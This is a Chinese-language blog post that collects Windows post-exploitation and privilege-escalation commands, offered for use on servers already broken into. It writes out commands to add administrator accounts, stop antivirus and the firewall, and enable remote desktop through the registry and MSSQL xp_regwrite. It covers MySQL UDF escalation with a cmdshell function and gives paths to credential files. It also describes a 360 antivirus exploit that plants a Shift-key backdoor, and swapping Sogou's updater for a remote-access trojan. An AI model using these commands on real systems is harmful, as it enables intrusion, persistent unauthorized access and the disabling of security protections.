最近遇到了需要提权的居然发现自己不会了。记录一些提权的语句以及思路、记录一些重要的(不定期更新)
0x1 DOS命令
查看版本:ver
查看权限:whoami
查看配置:systeminfo
查看用户:net user
查看进程:tasklist
查看正在运行的服务:tasklist /svc
查看开放的所有端口:netstat -ano
查询管理用户名:query user
查看指定服务的路径:sc qc Mysql
添加用户并提升权限:net user admin daxia.asd /add & net localgroup administrators admin /add
查看指定用户信息:net user admin
查看所有管理权限的用户:net localgroup administrators
加入远程桌面用户组:net localgroup “Remote Desktop Users” admin /add
突破最大连接数:mstsc /admin /v:127.0.0.1
删除用户:net user admin /del
更改系统登陆密码:net password admin
激活GUEST用户:net user guest /active:yes
开启TELNET服务:net start telnet
关闭麦咖啡:net stop “McAfee McShield”
关闭防火墙:net stop sharedaccess
查看当前目录的所有文件:dir c:\windows\
查看制定文件的内容:type c:\windows\1.asp
把cmd.exe复制到c:\windows的temp目录下并命名为cmd.txt:copy c:\windows\temp\cookies\cmd.exe c:\windows\temp\cmd.txt
开3389端口的命令:REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal” “Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
菜刀中 (设置CMD终端) setp C:/windows/temp/cmd.txt
0x2 MSSQL
3389登陆关键注册表位置:HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer\DenyTSConnections
其中键值DenyTSConnections 直接控制着3389的开启和关闭,当该键值为0表示3389开启,1则表示关闭。
而MSSQL的xp_regwrite的存储过程可以对注册进行修改,我们使用这点就可以简单的修改DenyTSConnections键值,从而控制3389的关闭和开启。
开启3389的SQL语句:exec master.dbo.xp_regwrite’HKEY_LOCAL_MACHINE’,'SYSTEM\CurrentControlSet\Control\Terminal Server’,'fDenyTSConnections’,'REG_DWORD’,0;–
关闭3389的SQL语句:exec master.dbo.xp_regwrite’HKEY_LOCAL_MACHINE’,'SYSTEM\CurrentControlSet\Control\Terminal Server’,'fDenyTSConnections’,'REG_DWORD’,1;–
2003可以实现一句话开3389: reg add “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp” /v PortNumber /t REG_DWORD /d 80 /f
1433一句话开3389:Exec
master.dbo.xp_regwrite’HKEY_LOCAL_MACHINE’,'SYSTEM\CurrentControlSet\Control\Terminal Server’,'fDenyTSConnections’,'REG_DWORD’,0;–
0x3 Mysql
查看Mysql安装的路径 方便我们查找到ROOT密码
select @@basedir as basePath from dual & select @@basedir;
添加用户:select cmdshell('net user 757 757 /add');
添加为管理组:select cmdshell('net localgroup administrators 757 /add');
利用NTFS ADS创建lib目录
select 'It is dll'into dumpfile 'C:\Program Files\MySQL\MySQL Server 5.1\lib::$INDEX_ALLOCATION';
利用NTFS ADS创建plugin目录
select 'It is dll'into dumpfile 'C:\Program Files\MySQL\MySQL Server 5.1\lib\plugin::$INDEX_ALLOCATION';
连接到本地的mysql: mysql -uroot -proot
更改远程连接设置: GRANT ALL PRIVILEGES ON . TO 'root'@'%' IDENTIFIED BY 'root' WITH GRANT OPTION
(如果在mysql中密码查看不了,本地安装mysql)
1.停止mysql服务 替换下载3个文件(user.MYI user.MYD user.frm)
2.切换到bin目录下,进入mysql安全模式,CMD命令:mysqld-nt –skip-grant-tables
3.重新打开一个cmd 切换到bin目录下,cmd命令:mysql -u root 版本不同有可能是:mysql -uroot -proot
4.select user,password from mysql.user;
UDF提权
创建相应的函数并执行命令
create function cmdshell returns string soname 'udf.dll';
select cmdshell('net user waitalone waitalone.cn /add');
select cmdshell('net localgroup administrators waitalone /add');
drop function cmdshell; 删除函数
delete from mysql.func where name='cmdshell' 删除函数
遇到Can't open shared library的情况、需要我们把udf.dll导出到lib\plugin目录下才可以、不存在plugin目录、利用NTFS ADS流来创建文件夹的方法(看上面)
0x4 常见&重要目录&注册表
serv-u密码:C:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini
360杀毒db文件替换: c:\Program Files\360\360SD\deepscan\Section\mutex.db c:\Program Files\360\360Safe\deepscan\Section\mutex.db C:\Program Files\360\360Safe\AntiSection\mutex.db
IISrewrite3 文件替换: C:\Program Files\Helicon\ISAPI_Rewrite3\Rewrite.log C:\Program Files\Helicon\ISAPI_Rewrite3\httpd.conf C:\Program Files\Helicon\ISAPI_Rewrite3\error.log
诺顿杀毒文件替换: c:\Program Files\Common Files\Symantec Shared\Persist.bak c:\Program Files\Common Files\Symantec Shared\Validate.dat c:\Program Files\Common Files\Symantec Shared\Persist.Dat
一流过滤相关目录及文件: C:\7i24.com\iissafe\log\startandiischeck.txt C:\7i24.com\iissafe\log\scanlog.htm
其他: Zend文件替换:C:\Program Files\Zend\ZendOptimizer-3.3.0\lib\Optimizer-3.3.0\php-5.2.x\ZendOptimizer.dll 华盾文件替换:C:\WINDOWS\hchiblis.ibl Flash文件替换:C:\WINDOWS\system32\Macromed\Flash\Flash10q.ocx DU Meter流量统计信息日志文件替换:c:\Documents and Settings\All Users\Application Data\Hagel Technologies\DU Meter\log.csv
360提权 找个可读可写目录上传360.exe
cmd命令:/c c:\windows\temp\cookies\360.exe
会提示3段英文: 360 Antivirus Privilege Escalation Exploit By friddy 2010.2.2 You will get a Shift5 door! Shift5 Backdoor created! 这是成功的征兆,接着连接服务器连按5下shift键,将弹出任务管理器,点击新建任务:explorer.exe 会出现桌面
搜狗提权:搜狗的目录默认是可读可写的,搜狗每隔一段时间就会自动升级,而升级的文件是pinyinup.exe
我们只要把这个文件替换为自己的远控木马,或是添加账户的批处理,等搜狗升级的时候,就可以达成我们的目的了。
本文作者为lufei,转载请注明。